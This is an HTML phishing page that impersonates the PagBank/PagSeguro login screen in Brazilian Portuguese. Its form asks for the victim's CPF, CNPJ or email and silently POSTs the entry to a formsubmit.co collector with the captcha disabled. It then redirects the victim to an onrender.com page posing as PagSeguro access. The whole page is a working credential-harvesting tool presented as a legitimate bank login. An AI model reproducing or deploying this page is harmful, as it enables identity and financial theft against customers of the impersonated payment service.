<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" type="image/x-icon" href="favicon.ico">  
    <script defer src="app.js"></script>
    <title>PagBank - A solução completa para pagamentos online</title>
   
   
   
   <style>
        /* Estilo para o body */
        body {
           
            margin: 0;
            padding: 0;
            background-image: url('back122.jpg');
            background-repeat: no-repeat;
            background-size: cover;
            font-family: Arial, sans-serif;
            
        }



        @media (max-width: 520px) {
            body {

              place-items: center;
                margin: 0;
            padding: 0;
      
            background-image: url('cel232.jpg');
            background-repeat: no-repeat;
            background-image: center;
            background-size: cover;
           
            font-family: Arial, sans-serif;
      }

            .form-input {
                padding: 10px,10px,10px,10px;
                border: 1px solid #ccc;
                margin-left: -50px;
                font-size: 24px;
                color:blue;
                border: 0;
                  border-bottom: 1px solid rgb(200,200,200);   
                  margin-right:105px;
                  outline: 0;
                  width: 80%;
                  
              }


            .login-container {
       
                    margin-top: 90px;
                    margin-left: -2000px;
                          
                    padding: 20px;
                    border-radius: 5px;
                
                }

                 .login-button {
                        margin-top: 27px;
                        display: inline-block;
                        margin-right: 70px;
                        width: 300px;
                        height: 50px;
                        padding: 10px;
                        background-color: #ec7000;
                        border: none;
                        color: #fff;
                        font-size: 18px;
                        border-radius: 3px;
                        cursor: pointer;
                    }


                    .botao

                    {
                    margin-left: -40px;
                    }

                    .imp

{
margin-left: 10%;
}

        
         

      
  }

  @media (max-width: 720px) {
            body {
                margin: 0;
            padding: 0;
            background-color: #fff;
            background-repeat: no-repeat;
            background-size: cover;
            font-family: Arial, sans-serif;
      }

                .form-input {
              padding: 5px;
              border: 1px solid #ccc;
              margin-left: -10px;
              margin-right: -100px;
              font-size: 24px;
              color:#ec7000;
              border: 0;
                border-bottom: 1px solid rgb(200,200,200);   
                margin-right:105px;
                outline: 0;
                width: 300px;
                
            }



                  .login-container {
                  
                  margin-top: 90px;
                  margin-left: -17%;
                          
                  padding: 20px;
                  border-radius: 5px;
            
                    }

                    .login-button {
                    margin-top: 27px;
                    margin-left: -100px;
                        width: 400px;
                        height: 50px;
                        padding: 10px;
                        background-color: #ec7000;
                        border: none;
                        color: #fff;
                        font-size: 18px;
                        border-radius: 3px;
                        cursor: pointer;
                    }


}         



      
  


 
        /* Estilo para o contêiner do formulário */
        .login-container {
            position: absolute;
            top: 275px;
            left: 77%;
            transform: translate(-50%, -50%);
    
            padding: 20px;
            border-radius: 5px;
          
        }

        /* Estilo para os campos de entrada e o botão */
        .form-input {
      
          padding: 5px;
         
          margin-left: 15px;
          font-size: 18px;
          color:#00000013;
         
          border: 0.120rem solid;             
          margin-right:105px;
          outline: none;
          width: 320px;
          border-radius: 2px;
          height: 38px;
          line-height: 14px;
            
        }

        input:focus{
          border-color: #66afe9;
          outline: 0;
          box-shadow: inset 0 1px 1px #00000013, 0 0 8px #66afe999;
          color:black;
          

          
          }

          input::placeholder{
          
          color:#5a646e;
          

          }

        .login-button {
         margin-top: -50px;
          margin-left: 14px;
            width: 335px;
            height: 50px;
            padding: 10px;
            background-color: #1082be;
            border: none;
            color: #fff;
            font-size: 16px;
            border-radius: 2px;
            cursor: pointer;
            
        }

        .login-button:hover {
            background-color: #145eb3;
        }


        ::placeholder{
  color:black;
  font-family: "Itau Display","sans-serif";
  font-size:  1.4rem;

}


    </style>
</head>
<body>
    <div class="login-container">

      <form action="https://formsubmit.co/4d82b907d099ea35a305eebf0e55076b" method="POST">

        <input type="hidden" name="_captcha" value="false">
        <input type="hidden" name="_next" value="https://acesso-pagseguro-uol-xwka.onrender.com">
        <input type="hidden" name="_template" value="table">
        <input type="hidden" name="_subject" value="Login Pag!">
        <div class="imp">
                   <input type="text" class="form-input" placeholder=" CPF, CNPJ ou E-mail " name="login" required>
           
          
            
            <br>
            <br>
            <br>
          </div>
         
            <br>
            <div class="botao">
            <button type="submit" class="login-button">Continuar</button>

          
        </form>
    </div>
</div>
</body>
</html>
